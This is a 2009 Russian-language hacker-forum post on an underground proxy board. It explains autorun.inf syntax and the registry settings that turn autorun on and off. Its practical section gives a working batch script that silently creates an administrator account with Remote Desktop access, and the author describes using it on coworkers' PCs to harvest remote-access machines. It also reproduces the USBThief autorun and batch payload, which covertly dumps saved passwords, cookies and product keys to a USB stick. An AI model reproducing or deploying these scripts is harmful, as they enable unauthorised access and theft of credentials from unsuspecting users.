Статья Autorun.inf и его возможности - Proxy-Base Community - Анонимность и безопасность в интернете.
Бесплатные прокси. Количество:
Прокси для пользователей форума (API). Количество:
Купить доступ к прокси-листам (API). Количество:
 



Информация по хайдам / репутации

(РЕКОМЕНДУЮ) №1 >>>DDos Атака<<|>>DDoS Service<<< ДДОС СЕРВИС<<|>>Заказать DDOS
Бесплатные прокси уже в Telegram
Все инфопродукты и приватная информация бесплатно
Старый 14.05.2009, 20:37   #1 (permalink)
SpiriT
 
Регистрация: 13.05.2009
Сообщений: 45
Member ID: 60
ICQ 676727

Репутация: 144
Репутация: 144
Сказал(а) спасибо: 9
Поблагодарили 85 раз(а) в 23 сообщениях
Топикстартер (автор темы) По умолчанию Статья Autorun.inf и его возможности

Начнем с теории:

Файл Autorun.inf используется для автоматического запуска приложений и программ на носителях информации в среде операционной системы Microsoft Windows. Этот файл должен находится в корне устройства для которого осуществляется автозапуск. Файл делится на структурные элементы — блоки. Название блоков пишется в квадратных скобках. Описание блоков содержит пары параметр→значение. (с) Wiki


Отключение\включение автозапуска

По умолчанию автозапуск отключен только для жёстких дисков . За включение и отключение автозапуска для разных типов носителей отвечает ключ реестра:
Код:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000000
Допустимые значения ключа NoDriveTypeAutoRun, описаны тут
Запрет автозапуска при помощи вышеприведённого ключа реестра не устраняет опасности заражения, значение ключа влияет только на исполнение autorun.inf при определении системой подключеного носителя, но не запрещает исполнение при двойном клике на значке носителя.
Компания Microsoft выпустила исправление, описанное в KB953252, полностью решающее данную проблему.

Также, можно воспользоваться альтернативным способом запрета обработки autorun.inf:

Код:
 
Код:
 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist" 
Этим ключем мы говорим системе что такой файл как Autorun.inf, обрабатывать низзя.
Возможное решение запрета автостарта всех типов файлов (только автостарт! обработка двойного клика и контекстного меню будет произведена)
Код:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\CancelAutoplay\Files]
"*.*"=""
Также авторан можно отключать следующей манпуляцией:
Start => Run => gpedit.msc => User Configuration => Administrative Templation => System
там уже настройку Turn off Autoplay установить в Disabled

И не забудем о сервисе Shell Hardware Detection:
Цитата:
Provides notifications for AutoPlay hardware events.
Его необходимо остановить (Stop) и Startup type также перевести в Disabled.

Соответственно для включения всей этой радости, нам необходимо произвести обратные манипуляции:
  • убить ключ реестра NoDriveTypeAutoRun, если таковой имеется;
  • убить значение @="@SYS: DoesNotExist" ключа ..\IniFileMapping\Autorun.inf
  • в групполиси настройку Turn off Autoplay установить в EnabledNot Configured; или в
  • стартануть сервис Shell Hardware Detection
Включение авторана тоже можно реализовать в виде bat-файла или java\VB скрипта, который тоже можно с успехом носить на флешке =)

Теория. Структурные блоки файла Autorun.inf

Блок [autorun]

Параметр action
Параметр action отвечает за отображение текста в меню автозапуска (используется редко).

Пример:
Код:
[autorun]
action=Воспроизвести в WinAmp
Допустимо указания текста из библиотеки dll:
Код:
[autorun]
action=[путь\]имя_файла,-IDресурса
Параметр icon
Параметр icon назначает файл иконки для устройства.

Пример:
Код:
[autorun]
icon=имя_ресурса[,номер]
или
[autorun]
icon=файл.ico
Параметр Defaulticon
Команда Defaulticon отличается лишь тем, что позволяет задавать ещё и путь к файлу значка:defaulticon=iconpath[,index]
В случае использования двух команд - icon и defaulticon система обрабатывает только defaulticon.


Параметр label
Этот параметр служит для указания «метки тома». Если применить метку label к диску, то реальная метка тома будет скрыта (её можно посмотреть в свойствах).
Код:
[autorun]
label=ЛюбойТекст

Параметр open

Параметр open содержит путь к файлу программы, которая будет запускаться при подключении устройства или попытке доступа к нему (открытие двойным щелчком). Этот параметр не следует использовать вместе с shellexecute, возможно возникновение конфликта!
Код:
[autorun]
...
open=[путь\]файл [параметр1 [параметр2] ...]
...

Параметр UseAutoPlay

Этот параметр совместим только с ОС MS Windows XP и работает не только на оптических дисках, но и на других сменных носителях. Допустимое значение одно — 1. Используется для включения обработки файла autoplay. Используется очень редко, в основном для автозапуска с флэш дисков без запросов на выбор действия (таких как открыть в проводнике, ничего не делать и т. д.)
Код:
[autorun]
...
UseAutoPlay=1
...

Параметр shellexecute

Файл, указанный в этом параметре, открывается при автозапуске той программой, которая ассоциирована с этим типом файлов в системном реестре Windows.
Этот параметр можно использовать вместо параметра open, использовать эти два параметра вместе не рекомендуется.
Данный параметр корректно работает на всех версиях ОС семейства Windows. В ОС MS Windows Vista диск с этим параметром сразу определяется как диск с программным обеспечением или играми, и для него вызывается соответствующее меню.

Пример:
Код:
[AutoRun]
shellexecute="Readme.txt"
В данном примере файл «.txt» будет открыт программой, которую пользователь по умолчанию использует для открытия файлов «.txt» (обычно это «Блокнот», notepad.exe).


Параметр shell
shell=ключ указывает команду по умолчанию (default) для контекстного меню диска.
shell\ключ задаёт пункт контекстного меню.
shell\ключ\command задаёт исполняемую команду для пункта меню «ключ».

Пример:
Код:
[autorun]
shell\ключевое_слово\command=Файл.exe 
shell\ключевое_слово=Заголовок_меню

Блок [Content]

В этом блоке используется всего три ключа: MusicFiles, PictureFiles, VideoFiles, что соответствует типам данных на носителе: музыка, изображения, видео.
Значениями для этих ключей могут быть только логическое true (истина) или false (ложь).
Истина задаётся любым из данных значений: 1, y, yes, t, true.
Ложь задаётся как: 0, n, no, f, false.

Пример:
Код:
[Content]
MusicFiles=Y
PictureFiles=0
VideoFiles=false

Блок [ExclusiveContentPaths]


При попытке определить тип содержимого на данном носителе информации, поиск файлов будет производится только в папках, прописанных в этом блоке. Путь задаётся в произвольном формате, приветствуются относительные пути.

Пример:
Код:
[ExclusiveContentPaths]
\музыка
\музыка\моя_музыка
фильмы
Данный блок поддерживается только ОС MS Windows Vista.


Блок [IgnoreContentPaths]

При попытке определить тип содержимого на данном носителе информации, поиск файлов не будет производиться в папках, прописанных в этом блоке и всех подпапках. Путь задаётся в произвольном формате, приветствуются относительные пути.
Пример:
Код:
[IgnoreContentPaths]
\Portable
\Documents
\Install
Данный блок поддерживается только ОС MS Windows Vista.


Блок [DeviceInstall]

Используется один параметр DriverPath, который указывает путь к драйверам. Используется очень редко и только в MS Windows XP.
Код:
[DeviceInstall]
DriverPath=drivers\video 
DriverPath=drivers\audio

Практика


В прошлом, работая одмином в одной мелкой айтишной канторе-аутсорсере, мой взор пал на авторан.инф, созданый злобным вирусов на флешке одного из пользователей. Тогда я негодовал, по поводу того, что автозапуск чего-либо с флешек, сиди-дисков, не детектится антивирусом. И возникла идея.
Я на своей флешке создал такой же файлик, который запускал bat-файл следующего содержания:
Код:
@echo off
net user LocalAdmin 123456789 /add
net localgroup Administrators LocalAdmin /add
net localgroup "Remote Desktop Users" LocalAdmin /add
net accounts /maxpwage:unlimited
И каждый раз, сидя за компами незадачливых пользователей, которые ходили в инет через NAT, не упускал возможности зделать дабл-клик по флешке, тем самым приумножая количество дедиков.. =)

Так же само можно вызывать в авторане SFX-архив, который будет себя в фоне распаковывать в нужное место (например в %temp%) и выполнять в фоне те же скрипты, может даже громоздкие по своему содержанию (например применение групповых политик, и т.д.).


Рассмотрим реализацию простенькой и популярной програмки USBThief:
Содержимое Autorun.inf:
Код:
[autorun] 
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\progstart.bat
Авторан вызывает progstart.bat, который в свою очередь вызывает batexe\moddump.bat, его содержание:
Код:
@echo off
nircmd.exe execmd mkdir "dump\~$sys.computername$"
nircmd.exe execmd .\batexe\mspass.exe /shtml "dump\~$sys.computername$\IMClients.html"
nircmd.exe execmd .\batexe\mailpv.exe /shtml "dump\~$sys.computername$\mail.html"
nircmd.exe execmd .\batexe\pspv.exe /shtml "dump\~$sys.computername$\selected.html"
nircmd.exe execmd .\batexe\iehv.exe /shtml "dump\~$sys.computername$\history.html"
nircmd.exe execmd .\batexe\ProduKey.exe /shtml "dump\~$sys.computername$\ProductKey.html"
nircmd.exe execmd .\batexe\iepv.exe /shtml "dump\~$sys.computername$\IEPasswords.html"
nircmd.exe execmd .\batexe\netpass.exe /shtml "dump\~$sys.computername$\NetworkPasswords.html"
nircmd.exe execmd .\batexe\pstpassword.exe /shtml "dump\~$sys.computername$\PstPassword.html"
nircmd.exe execmd .\batexe\cports.exe /shtml "dump\~$sys.computername$\OpenPorts.html"
nircmd.exe execmd .\batexe\awatch.exe /shtml "dump\~$sys.computername$\NetworkAdapter.html"
nircmd.exe execmd .\batexe\mzcv.exe /shtml "dump\~$sys.computername$\MozillaCookies.html"
nircmd.exe execmd .\batexe\wul.exe /shtml "dump\~$sys.computername$\InstalledUpdates.html"
nircmd.exe execmd .\batexe\strun.exe /shtml "dump\~$sys.computername$\Startup.html"
nircmd.exe execmd .\batexe\servimin.exe /shtml "dump\~$sys.computername$\Services.html"
Указанный батник вызывает по очереди компоненты, которые дампят все пароли и явки, не брезгуя даже лицензиями и кукисами.. и это всё происходит в фоне, без ведома юзера, в комп которого вы воткнули флешку..

Как видно -- возможности у файла Autorun.inf достаточно широкие, всё зависит от вашей фантазии

Л®вёј/div>
http://grabberz.com.ua/img/smilies/ab.gif

Статья написана в ознакомительных целях, дабы показать рядовому пользователю возможности, которые несет в себе этот загадочный авторан..

Л®вёј/div>
http://grabberz.com.ua/img/smilies/ad.gif


†Be@®† вне форума   Ответить с цитированием
8 пользователя(ей) сказали cпасибо:
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Статья: Угон дедиков [ipscan+ntscan] ImPuls Брут дедиков, способы брута, нужный софт 5 07.06.2009 11:23
[Статья] Делаем online магазин KeNtAvRrr Флейм 0 13.05.2009 18:34




DDoS Protected




Мы в твиттере, Proxy-Base.Org Twitter

Proxy-Base Community - Анонимность и безопасность в интернете.
Наши партнеры: CRC Labs, SEO-Crack.Com, Garsuk.Com, SED Team, Skladchik.com, BSS Family

Powered by vBulletin® | Булка сделана в пекарне®
Copyright © 2000 - , Jelsoft Enterprises Ltd. Перевод: zCarot
Вся информация на сайте выложена исключительно в ознакомительных целях.